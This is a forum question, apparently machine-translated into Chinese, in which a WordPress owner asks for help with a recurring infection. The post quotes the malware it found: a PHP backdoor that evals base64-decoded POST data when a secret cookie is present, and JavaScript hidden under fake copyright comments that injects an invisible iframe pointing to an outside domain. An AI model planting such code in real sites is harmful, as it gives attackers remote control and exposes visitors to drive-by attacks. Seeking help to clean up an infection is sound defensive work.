由於注入了一些js代碼的惡意軟件,幾天後,我的一個WordPress網站在google警報下重定向。 (http://freakymonster.be)Wordpress惡意軟件一次又一次
我跑了好幾個惡意軟件檢測,但所有我能找到的是:
- 一些PHP文件與此代碼中:
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and [email protected](@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
- 一些JS代碼注入我的js文件中,像這樣
/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Vuelingflytersku() {
function setCookie(name, value, expires) {
var date = new Date(new Date().getTime() + expires*1000);
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function Ursilifer(name) {
var matches = document.cookie.match(new RegExp("(?:^|;)" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)"));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
var cookie = Ursilifer('karater7una8ue');
if (cookie == undefined) {
setCookie('karater7una8ue', true, 259201);
document.write('<iframe src="http://miriolda.onlyradiogreen.com.ar/aflorigunam16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');
}
}
Vuelingflytersku();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
我完全重新安裝的WordPress和插件,重新設置管理員密碼,但無論如何,它回來。我真的不知道該怎麼辦
因此,如果有人可以給一些建議,這將是巨大
這個問題似乎是無關緊要的,因爲它不是編程相關的,也許適合http://security.stackexchange.com/help/on-topic – bummi 2014-12-17 23:41:35